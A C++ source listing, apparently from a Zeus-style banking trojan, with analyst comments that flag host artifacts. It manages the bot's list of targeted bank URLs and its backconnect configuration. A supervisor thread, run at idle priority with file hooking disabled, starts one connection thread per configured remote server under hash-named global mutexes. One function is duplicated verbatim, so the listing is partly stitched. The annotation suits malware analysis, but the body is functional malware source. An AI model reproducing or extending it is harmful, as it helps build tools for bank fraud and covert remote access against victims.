/*
  Thread body that refreshes the in-memory copy of the bank URL list.

  Each time eventHandle is signalled, the current local configuration is
  re-read and the ITEM_BANK_LIST setting is copied into urls / urlsSize under
  the csupd critical section. In the code visible here the event is pulsed by
  bank::_addStatic() after a successful configuration write.

  IN p - unused.

  The loop ends only when the wait returns something other than WAIT_OBJECT_0.
*/
void WINAPI bank::proc(void* p)
{
  // No timeout: the thread stays blocked until the named event is signalled.
  while(WaitForSingleObject(eventHandle, INFINITE) == WAIT_OBJECT_0)
  {
    BinStorage::STORAGE *config = LocalConfig::getCurrent();
    if(config != NULL)
    {
      // csupd guards urls / urlsSize while they are being replaced.
      EnterCriticalSection(&csupd);
      DWORD itemListSize;
      LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
      // The cached list is replaced only when the stored item passes isValidList().
      if(itemList != NULL && isValidList(itemList, itemListSize))
      {
        Mem::reallocEx(&urls, (itemListSize)*sizeof(char));
        Mem::_copy(urls, itemList, itemListSize);
        urlsSize = itemListSize;
      }
      LeaveCriticalSection(&csupd);
      // Both buffers are released here on every pass, whether or not the list was accepted.
      Mem::free(itemList);
      Mem::free(config);
    }
  }
}
/*
  One-time set-up of the bank-list module.

  Initialises csupd, loads the initial ITEM_BANK_LIST setting into
  urls / urlsSize, creates two named events and starts bank::proc on a new
  thread.

  Analyst note: the two named event objects are host artifacts of this
  module. Their names come from Core::generateObjectName(), which is not shown
  here, so the concrete name format cannot be stated from this listing.
*/
void bank::init()
{
  InitializeCriticalSection(&csupd);

  // Initial load of the list; csupd is not taken here (the worker thread is started only at the end).
  BinStorage::STORAGE *config = LocalConfig::getCurrent();
  if(config != NULL)
  {
    DWORD itemListSize;
    LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
    if(itemList != NULL && isValidList(itemList, itemListSize))
    {
      // Any previously held copy is released before the new one is stored.
      if(urls != NULL) Mem::free(urls);
      urls = (LPSTR)Mem::copyEx(itemList, itemListSize);
      urlsSize = itemListSize;
    }
    Mem::free(itemList);
    Mem::free(config);
  }

  WCHAR objectName[50];

  // Event waited on by bank::proc. CreateEventW arguments: manual-reset = TRUE, initial state = FALSE.
  // NOTE(review): KON_SESSION presumably selects a per-session object name - confirm in Core::generateObjectName.
  Core::generateObjectName(Core::OBJECT_ID_BANK_LIST_ARRIVED, objectName, MalwareTools::KON_SESSION);
  // NOTE(review): saAllowAll is, by its name, a permissive security descriptor - confirm where coreData is initialised.
  eventHandle = CWA(kernel32, CreateEventW)(&coreData.securityAttributes.saAllowAll, TRUE, FALSE, objectName);

  // Second named event, created the same way; it is not used anywhere else in the code visible here.
  Core::generateObjectName(Core::OBJECT_ID_REPORTS_SENSETIVE, objectName, MalwareTools::KON_SESSION);
  sensetiveHandle = CWA(kernel32, CreateEventW)(&coreData.securityAttributes.saAllowAll, TRUE, FALSE, objectName);

  // Starts bank::proc; the thread handle returned by CreateThread is not kept.
  CWA(kernel32, CreateThread)(NULL,0,(LPTHREAD_START_ROUTINE)proc,NULL,0, NULL);
}
/*
  Adds one URL entry to the ITEM_BANK_LIST setting of the local configuration.

  IN url - string to add; it is lower-cased before being stored.

  Return - true if the configuration was written back (eventHandle is then
           pulsed so that bank::proc reloads the list),
           false if url is empty, the entry already exists, or any storage
           step failed.
*/
bool bank::_addStatic(LPSTR url)
{
  WORD newItemSize;
  char newItem[256 + 1 + 1];

  // Build the new element.
  {
    // The length is narrowed to a BYTE before it is used.
    BYTE urlLen = (BYTE)Str::_LengthA(url);
    char *offset = newItem;

    if(urlLen == 0)return false;
    // Size of the element: the characters plus one terminator byte.
    newItemSize = (urlLen + 1);

    Str::_CopyA(offset, url, urlLen);
    // Lower-cases the element in place.
    CWA(user32, CharLowerBuffA)(newItem, newItemSize);
  }

  // Open the configuration for read/write.
  BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
  if(config == NULL)return false;

  // Get the list of existing elements.
  bool ok = true;
  DWORD itemListSize;
  LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);

  // If a valid list exists, look for a duplicate.
  if(isValidList(itemList, itemListSize))
  {
    LPSTR curItem = itemList;
    do
    {
      // Stop once the bytes left in the list are not more than the size of the element searched for.
      if((DWORD)((itemList + itemListSize) - curItem) <= newItemSize)break;

      // Compare newItemSize bytes (the string and its terminator) at the start of this element.
      if(Mem::_compare(curItem, newItem, newItemSize) == 0)
      {
        WDEBUG0(WDDT_INFO, "Item already exists.");
        ok = false;
        break;
      }
    }
    while((curItem = Str::_multiStringGetIndexA(curItem, 1)) != NULL);

    // No duplicate: grow the buffer and append, starting at the last byte of the old list.
    if(ok == true && (ok = Mem::reallocEx(&itemList, itemListSize + newItemSize)) == true)
    {
      Mem::_copy2(itemList + itemListSize - 1, newItem, newItemSize + 1);
      ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, itemList, itemListSize + newItemSize);
    }
  }
  // No valid list: create the item, or overwrite a stored item that failed isValidList().
  else
  {
    if(itemList == NULL)ok = BinStorage::_addItem(&config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
    else ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
  }

  Mem::free(itemList);

  // On failure the working copy is freed and NULL is handed to endReadWrite().
  // NOTE(review): presumably NULL makes endReadWrite() close the session without saving - confirm in LocalConfig.
  if(ok == false)
  {
    Mem::free(config);
    config = NULL;
  }

  ok = LocalConfig::endReadWrite(config);
  // Signals the event that bank::proc waits on.
  if(ok)PulseEvent(eventHandle);
  return ok;
}
/*
  Removes from the ITEM_BANK_LIST setting every entry that matches a mask.

  IN url - mask passed to Str::_matchExA() and tested against each stored entry.

  Return - result of LocalConfig::endReadWrite(); false if the configuration
           could not be opened.
*/
bool bank::_removeStatic(LPSTR url)
{
  // Load the config for read/write.
  BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
  if(config == NULL)return false;

  // Get the list of elements.
  DWORD itemListSize;
  LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);

  // No elements stored.
  if(itemList == NULL)
  {
    Mem::free(config);
    return LocalConfig::endReadWrite(NULL);
  }

  // Validate the list.
  bool changed = false;
  if(isValidList(itemList, itemListSize))
  {
    // Buffer that receives the elements which do not match the mask; same size as the original list.
    LPSTR newItemList = (LPSTR)Mem::alloc(itemListSize);
    if(newItemList != NULL)
    {
      // Walk the elements.
      LPSTR curItem = itemList;
      LPSTR offset = newItemList;
      int len;

      do
      {
        LPSTR curUrl = curItem;
        if(Str::_matchExA(url, curUrl))
        {
          // Matching entry: it is dropped by not copying it.
          changed = true;
        }
        else
        {
          len = Str::_LengthA(curUrl);
          Str::_CopyA(offset, curUrl, len);
          offset += len + 1;
          *offset = 0; // Terminating byte of the multi-string.
        }
      }
      while((curItem = Str::_multiStringGetIndexA(curItem, 1)) != NULL);

      if(changed == true)
      {
        // If nothing was kept, step back one byte so the size passed below evaluates to 0.
        if(offset == newItemList)offset--; // Almost equivalent to BinStorage::ITEMF_COMBINE_DELETE.
        changed = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItemList, offset - newItemList + 1);
      }

      Mem::free(newItemList);
    }
  }

  Mem::free(itemList);

  // Nothing changed (or the write failed): free the working copy and hand NULL to endReadWrite().
  if(changed == false)
  {
    Mem::free(config);
    config = NULL;
  }

  return LocalConfig::endReadWrite(config);
}
/*
  Adds one backconnect entry to the ITEM_BACKCONNECT_LIST setting of the local
  configuration. An entry is stored as three consecutive zero-terminated
  strings: servicePort, server, serverPort.

  IN servicePort - first string of the entry.
  IN server      - second string of the entry.
  IN serverPort  - third string of the entry.

  Return - true if the configuration was written back,
           false if any argument is empty, the entry already exists, or a
           storage step failed.

  Analyst note: the stored list is what the proc() thread in this listing
  walks to start one connection thread per entry, so this setting is the
  place to look for configured remote endpoints.
*/
bool BackconnectBot::_addStatic(LPSTR servicePort, LPSTR server, LPSTR serverPort)
{
  WORD newItemSize;
  char newItem[256 * 3 + 3 + 1];

  // Build the new element.
  {
    // Each length is narrowed to a BYTE before it is used.
    BYTE servicePortLen = (BYTE)Str::_LengthA(servicePort);
    BYTE serverLen = (BYTE)Str::_LengthA(server);
    BYTE serverPortLen = (BYTE)Str::_LengthA(serverPort);
    char *offset = newItem;

    if(servicePortLen == 0 || serverLen == 0 || serverPortLen == 0)return false;
    // Three strings, each with its own terminator byte.
    newItemSize = (servicePortLen + 1) + (serverLen + 1) + (serverPortLen + 1);

    Str::_CopyA(offset, servicePort, servicePortLen);
    offset += servicePortLen + 1;

    Str::_CopyA(offset, server, serverLen);
    offset += serverLen + 1;

    Str::_CopyA(offset, serverPort, serverPortLen);
    offset += serverPortLen + 1;

    *offset = 0; // Terminating byte of the multi-string.
    // Lower-cases the whole element in place.
    CWA(user32, CharLowerBuffA)(newItem, newItemSize);
  }

  // Open the configuration for read/write.
  BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
  if(config == NULL)return false;

  // Get the list of existing elements.
  bool ok = true;
  DWORD itemListSize;
  LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);

  // If a valid list exists, look for a duplicate.
  if(isValidList(itemList, itemListSize))
  {
    LPSTR curItem = itemList;
    do
    {
      // Stop once the bytes left in the list are not more than the size of the element searched for.
      if((DWORD)((itemList + itemListSize) - curItem) <= newItemSize)break;

      // Compare newItemSize bytes (all three strings with their terminators) at the start of this element.
      if(Mem::_compare(curItem, newItem, newItemSize) == 0)
      {
        WDEBUG0(WDDT_INFO, "Item already exists.");
        ok = false;
        break;
      }
    }
    // Entries are three strings long, so the walk advances three strings at a time.
    while((curItem = Str::_multiStringGetIndexA(curItem, 3)) != NULL);

    // No duplicate: grow the buffer and append, starting at the last byte of the old list.
    if(ok == true && (ok = Mem::reallocEx(&itemList, itemListSize + newItemSize)) == true)
    {
      Mem::_copy(itemList + itemListSize - 1, newItem, newItemSize + 1);
      ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, itemList, itemListSize + newItemSize);
    }
  }
  // No valid list: create the item, or overwrite a stored item that failed isValidList().
  else
  {
    if(itemList == NULL)ok = BinStorage::_addItem(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
    else ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
  }

  Mem::free(itemList);

  // On failure the working copy is freed and NULL is handed to endReadWrite().
  // NOTE(review): presumably NULL makes endReadWrite() close the session without saving - confirm in LocalConfig.
  if(ok == false)
  {
    Mem::free(config);
    config = NULL;
  }

  return LocalConfig::endReadWrite(config);
}
/*
  Thread that supervises the backconnect entries: it periodically reads
  ITEM_BACKCONNECT_LIST from the local configuration and, for every entry that
  does not yet have its per-entry mutex, starts a procConnection thread.

  Return - 1 if the control mutex could not be obtained, otherwise 0 after the
           stop event ends the loop.

  Analyst notes (host artifacts visible in this function):
    - a control mutex obtained through Core::waitForMutexOfObject() with
      OBJECT_ID_BACKCONNECT_CONTROL / KON_GLOBAL (name format not shown here);
    - one mutex per entry named "Global\" followed by 24 upper-case hex digits,
      i.e. the CRC32 of each of the entry's three strings;
    - the thread runs at THREAD_PRIORITY_IDLE and wakes every 60 seconds
      (every second when BO_DEBUG > 0).
*/
static DWORD WINAPI proc(void *)
{
  CoreHook::disableFileHookerForCurrentThread(true);

  // Serialises this supervisor through a named mutex; a NULL result ends the thread with code 1.
  HANDLE mutex = Core::waitForMutexOfObject(Core::OBJECT_ID_BACKCONNECT_CONTROL, MalwareTools::KON_GLOBAL);
  if(mutex == NULL)
  {
    WDEBUG0(WDDT_ERROR, "Failed");
    return 1;
  }

  CWA(kernel32, SetThreadPriority)(CWA(kernel32, GetCurrentThread)(), THREAD_PRIORITY_IDLE);

  WDEBUG0(WDDT_INFO, "Started.");
  // The wait on stopEvent doubles as the polling delay: the body runs on every timeout
  // and the loop ends as soon as the wait returns anything else.
#if(BO_DEBUG > 0)
  if(Core::isActive())while(CWA(kernel32, WaitForSingleObject)(coreData.globalHandles.stopEvent, 1000) == WAIT_TIMEOUT)
#else
  if(Core::isActive())while(CWA(kernel32, WaitForSingleObject)(coreData.globalHandles.stopEvent, 60 * 1000) == WAIT_TIMEOUT)
#endif
  {
    BinStorage::STORAGE *config = LocalConfig::getCurrent();
    if(config != NULL)
    {
      DWORD itemListSize;
      LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
      if(itemList != NULL && isValidList(itemList, itemListSize))
      {
        LPSTR curItem = itemList;
        do
        {
          // An entry is three consecutive strings inside the multi-string.
          LPSTR curServicePort = curItem;
          LPSTR curServer = Str::_multiStringGetIndexA(curItem, 1);
          LPSTR curServerPort = Str::_multiStringGetIndexA(curItem, 2);

          // Generate the per-entry mutex.
          HANDLE bcMutex = NULL;
          {
            DWORD nameParts[3];
            nameParts[0] = Crypt::crc32Hash(curServicePort, Str::_LengthA(curServicePort));
            nameParts[1] = Crypt::crc32Hash(curServer, Str::_LengthA(curServer));
            nameParts[2] = Crypt::crc32Hash(curServerPort, Str::_LengthA(curServerPort));

            // 7 characters for "Global\", 3 * 8 hex digits, 1 terminator.
            WCHAR mutexName[7 + 3 * 8 + 1];
            // The mutex is created only if the formatted name has exactly the expected length.
            if(Str::_sprintfW(mutexName, sizeof(mutexName) / sizeof(WCHAR), L"Global\\%08X%08X%08X", nameParts[0], nameParts[1], nameParts[2]) == sizeof(mutexName) / sizeof(WCHAR) - 1)
            {
              WDEBUG1(WDDT_INFO, "mutexName=[%s]", mutexName);
              // NOTE(review): presumably returns NULL when the mutex already exists, which would keep
              // one connection thread per entry - confirm in Sync::_createUniqueMutex.
              bcMutex = Sync::_createUniqueMutex(&coreData.securityAttributes.saAllowAll, mutexName);
            }
          }

          // Create the child thread.
          if(bcMutex != NULL)
          {
            BCDATA *bcData = (BCDATA *)Mem::alloc(sizeof(BCDATA));
            if(bcData != NULL)
            {
              // The strings are duplicated because itemList is freed at the end of this pass.
              bcData->servicePort = Str::_CopyExA(curServicePort, -1);
              bcData->server = Str::_CopyExA(curServer, -1);
              bcData->serverPort = Str::_CopyExA(curServerPort, -1);
              bcData->mutex = bcMutex;

              if(bcData->servicePort != NULL && bcData->server != NULL && bcData->serverPort != NULL)
              {
                // On success bcData and bcMutex are left with the new thread; 'continue' skips the clean-up below.
                // NOTE(review): 512 * 1024 is presumably the stack size - confirm in Process::_createThread.
                if(Process::_createThread(512 * 1024, procConnection, bcData) > 0)continue;
              }

              // Failure path: release everything that was allocated for this entry.
              Mem::free(bcData->servicePort);
              Mem::free(bcData->server);
              Mem::free(bcData->serverPort);
              Mem::free(bcData);
            }
            Sync::_freeMutex(bcMutex);
          }
        }
        while((curItem = Str::_multiStringGetIndexA(curItem, 3)) != NULL);
      }
      Mem::free(itemList);
      Mem::free(config);
    }
  }

  WDEBUG0(WDDT_INFO, "Stopped.");
  Sync::_freeMutex(mutex);

  return 0;
}
/*
  Removes from the ITEM_BACKCONNECT_LIST setting every entry whose three
  strings all match the given masks.

  IN servicePort - mask tested against the first string of each entry.
  IN server      - mask tested against the second string of each entry.
  IN serverPort  - mask tested against the third string of each entry.

  Return - result of LocalConfig::endReadWrite(); false if the configuration
           could not be opened.
*/
bool BackconnectBot::_removeStatic(LPSTR servicePort, LPSTR server, LPSTR serverPort)
{
  // Load the config for read/write.
  BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
  if(config == NULL)return false;

  // Get the list of elements.
  DWORD itemListSize;
  LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);

  // No elements stored.
  if(itemList == NULL)
  {
    Mem::free(config);
    return LocalConfig::endReadWrite(NULL);
  }

  // Validate the list.
  bool changed = false;
  if(isValidList(itemList, itemListSize))
  {
    // Buffer that receives the elements which do not match the masks; same size as the original list.
    LPSTR newItemList = (LPSTR)Mem::alloc(itemListSize);
    if(newItemList != NULL)
    {
      // Walk the elements.
      LPSTR curItem = itemList;
      LPSTR offset = newItemList;
      int len;

      do
      {
        // An entry is three consecutive strings inside the multi-string.
        LPSTR curServicePort = curItem;
        LPSTR curServer = Str::_multiStringGetIndexA(curItem, 1);
        LPSTR curServerPort = Str::_multiStringGetIndexA(curItem, 2);

        if(Str::_matchExA(servicePort, curServicePort) && Str::_matchExA(server, curServer) && Str::_matchExA(serverPort, curServerPort))
        {
          // All three fields match: the entry is dropped by not copying it.
          changed = true;
        }
        else
        {
          len = Str::_LengthA(curServicePort);
          Str::_CopyA(offset, curServicePort, len);
          offset += len + 1;

          len = Str::_LengthA(curServer);
          Str::_CopyA(offset, curServer, len);
          offset += len + 1;

          len = Str::_LengthA(curServerPort);
          Str::_CopyA(offset, curServerPort, len);
          offset += len + 1;

          *offset = 0; // Terminating byte of the multi-string.
        }
      }
      while((curItem = Str::_multiStringGetIndexA(curItem, 3)) != NULL);

      if(changed == true)
      {
        // If nothing was kept, step back one byte so the size passed below evaluates to 0.
        if(offset == newItemList)offset--; // Almost equivalent to BinStorage::ITEMF_COMBINE_DELETE.
        changed = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItemList, offset - newItemList + 1);
      }

      Mem::free(newItemList);
    }
  }

  Mem::free(itemList);

  // Nothing changed (or the write failed): free the working copy and hand NULL to endReadWrite().
  if(changed == false)
  {
    Mem::free(config);
    config = NULL;
  }

  return LocalConfig::endReadWrite(config);
}
/*
  Adds one backconnect entry to the ITEM_BACKCONNECT_LIST setting of the local
  configuration. An entry is stored as three consecutive zero-terminated
  strings: servicePort, server, serverPort.

  IN servicePort - first string of the entry.
  IN server      - second string of the entry.
  IN serverPort  - third string of the entry.

  Return - true if the configuration was written back,
           false if any argument is empty, the entry already exists, or a
           storage step failed.
*/
bool BackconnectBot::_addStatic(LPSTR servicePort, LPSTR server, LPSTR serverPort)
{
  WORD newItemSize;
  char newItem[256 * 3 + 3 + 1];

  // Build the new element.
  {
    // Each length is narrowed to a BYTE before it is used.
    BYTE servicePortLen = (BYTE)Str::_LengthA(servicePort);
    BYTE serverLen = (BYTE)Str::_LengthA(server);
    BYTE serverPortLen = (BYTE)Str::_LengthA(serverPort);
    char *offset = newItem;

    if(servicePortLen == 0 || serverLen == 0 || serverPortLen == 0)return false;
    // Three strings, each with its own terminator byte.
    newItemSize = (servicePortLen + 1) + (serverLen + 1) + (serverPortLen + 1);

    Str::_CopyA(offset, servicePort, servicePortLen);
    offset += servicePortLen + 1;

    Str::_CopyA(offset, server, serverLen);
    offset += serverLen + 1;

    Str::_CopyA(offset, serverPort, serverPortLen);
    offset += serverPortLen + 1;

    *offset = 0; // Terminating byte of the multi-string.
    // Lower-cases the whole element in place.
    CWA(user32, CharLowerBuffA)(newItem, newItemSize);
  }

  // Open the configuration for read/write.
  BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
  if(config == NULL)return false;

  // Get the list of existing elements.
  bool ok = true;
  DWORD itemListSize;
  LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);

  // If a valid list exists, look for a duplicate.
  if(isValidList(itemList, itemListSize))
  {
    LPSTR curItem = itemList;
    do
    {
      // Stop once the bytes left in the list are not more than the size of the element searched for.
      if((DWORD)((itemList + itemListSize) - curItem) <= newItemSize)break;

      // Compare newItemSize bytes (all three strings with their terminators) at the start of this element.
      if(Mem::_compare(curItem, newItem, newItemSize) == 0)
      {
        WDEBUG0(WDDT_INFO, "Item already exists.");
        ok = false;
        break;
      }
    }
    // Entries are three strings long, so the walk advances three strings at a time.
    while((curItem = Str::_multiStringGetIndexA(curItem, 3)) != NULL);

    // No duplicate: grow the buffer and append, starting at the last byte of the old list.
    if(ok == true && (ok = Mem::reallocEx(&itemList, itemListSize + newItemSize)) == true)
    {
      Mem::_copy(itemList + itemListSize - 1, newItem, newItemSize + 1);
      ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, itemList, itemListSize + newItemSize);
    }
  }
  // No valid list: create the item, or overwrite a stored item that failed isValidList().
  else
  {
    if(itemList == NULL)ok = BinStorage::_addItem(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
    else ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
  }

  Mem::free(itemList);

  // On failure the working copy is freed and NULL is handed to endReadWrite().
  // NOTE(review): presumably NULL makes endReadWrite() close the session without saving - confirm in LocalConfig.
  if(ok == false)
  {
    Mem::free(config);
    config = NULL;
  }

  return LocalConfig::endReadWrite(config);
}